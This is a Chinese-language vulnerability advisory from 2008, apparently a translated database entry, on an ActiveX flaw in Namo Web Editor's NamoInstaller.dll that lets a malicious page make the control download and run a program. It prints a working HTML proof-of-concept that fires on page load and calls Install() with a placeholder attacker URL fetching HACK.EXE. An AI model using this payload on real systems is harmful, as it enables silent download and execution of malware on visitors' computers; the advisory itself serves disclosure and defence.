安全研究
安全漏洞
Namo Web Editor NamoInstaller.dll ActiveX控件任意命令执行漏洞
发布日期:2008-01-25
更新日期:2008-01-29
受影响系统:SJ NAMO Web Editor NamoInstaller.dll 3.0.0.1
描述:
BUGTRAQ ID:
27453
Namo Web Editor是一个软件包,允许Web应用人员为网站用户提供创建文档、上传文件等支持。
Namo Web Editor的ActiveX控件实现上存在漏洞,远程攻击者可能利用此漏洞在用户系统上执行任意命令。
Namo Web Editor软件包中所安装的NamoInstaller.NamoInstall.1 ActiveX控件(NamoInstaller.dll)没有正确地验证对Install()方式的输入参数,如果用户受骗访问了恶意网页并向该方式传送了恶意参数的话,就可能导致下载并执行恶意程序。
<*来源:plan-s (
http://www.Plan-S.cn)
链接:
http://secunia.com/advisories/28649/
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<html>
<head>
<html>
<head>
<title>Namo Web Editor NamoInstaller.dll install Method Exploit</title>
<script language="JavaScript" defer>
function Check()
{
obj.Install("
http://ATTACKER.COM/HACK.EXE")
}
</script>
</head>
<body onload="JavaScript: return Check();">
<object id="obj" classid="clsid:AF465549-1D22-4140-A273-386FA8877E0A" height="0" width="0">
Unable to create object
</object>
</body>
</html>
建议:
厂商补丁:
SJ NAMO
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.namo.com/浏览次数:2698
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载 绿盟科技给您安全的保障 |